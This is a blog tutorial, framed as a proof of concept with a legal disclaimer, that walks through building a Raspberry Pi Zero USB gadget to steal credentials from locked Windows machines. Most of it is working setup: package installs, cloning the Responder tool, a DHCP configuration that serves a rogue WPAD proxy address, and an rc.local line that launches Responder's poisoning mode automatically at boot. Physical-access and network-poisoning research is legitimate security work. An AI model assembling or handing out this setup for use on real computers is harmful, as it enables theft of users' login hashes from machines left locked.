Snagging Credentials from Locked Machines with Raspberry Pi Zero

I get really excited anytime I get to use my Raspberry Pi Zero. When I saw Rob Fuller’s Tweet this morning (@mubix), I got really excited. Coincidentally I had a thing for single board computers and been playing with the USB Gadget mode for the Pi Zero the last couple of weeks. As soon as I saw the tweet, I knew I have to do this with the Pi Zero.

This is a proof of concept. Please think before you apply this in the real world.

Disclaimer:

Any actions and or activities related to the material contained within this website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and elevatedprompt will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

REQUIREMENTS:

RaspberryPi Zero
4GB or larger Micro SD Card
OTG USB Cable
USB Ethernet adapter or WiFi Dongle (initial setup)

I am going to assume that the reader knows how to flash an image onto the SD Card. I went with the Raspbian-lite version as its better with RAM utilization on the Pi. Boot up the Raspberry Pi Zero and install the software required:

sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server sudo pip install pycrypto sudo su cd ~/ git clone https://github.com/spiderlabs/responder

EDIT /ETC/NETWORK/INTERFACES

Open /etc/network/interfaces with your favorite text editor and add the following to it:

auto usb0 allow-hotplug usb0 iface usb0 inet static address 192.168.2.201 netmask 255.255.255.0 gateway 192.168.2.1

CONFIGURE DHCPD SETTINGS: /ETC/DHCP/DHCPD.CONF

Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none; option domain-name "domain.local"; option domain-name-servers 192.168.2.201; default-lease-time 60; max-lease-time 72; # If this DHCP server is the official DHCP server for the local # network, the authoritative directive should be uncommented. authoritative; # Use this to send dhcp log messages to a different log file (you also # have to hack syslog.conf to complete the redirection). log-facility local7; # wpad option local-proxy-config code 252 = text; # A slightly different configuration for an internal subnet. subnet 192.168.2.0 netmask 255.255.255.0 { range 192.168.2.1 192.168.2.2; option routers 192.168.2.201; option local-proxy-config "http://192.168.2.201/wpad.dat"; }

EDIT /ETC/RC.LOCAL

Edit /etc/rc.local and add the following before exit 0:

# Clear leases rm -f /var/lib/dhcp/dhcpd.leases touch /var/lib/dhcp/dhcpd.leases # Start DHCP server /usr/sbin/dhcpd # Start Responder /usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'

CREATE THE CONFIGURATION FILE FOR SCREEN

sudo su; nano ~/.screenrc and add this:
# Logging deflog on logfile /root/logs/screenlog_$-- USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Once the above steps are completed, shutdown the Pi Zero (shutdown -h now) and remove the Micro SD Card. Connect the Micro SD card to your computer. We will need to modify config.txt and cmdline.txt to turn the OTG port to a virtual Ethernet port. Please ensure that you are running a version of Raspbian released after May 2016

EDIT CONFIG.TXT

Add this after the last line:
dtoverlay=dwc2

EDIT CMDLINE.TXT

After rootwait (the last word on the first line) add a space and then
modules-load=dwc2,g_ether

Safely eject the Micro SD Card. Put it back in the Pi Zero. The device is ready. Use the USB OTG cable to connect it to the PC. Happy Hacking!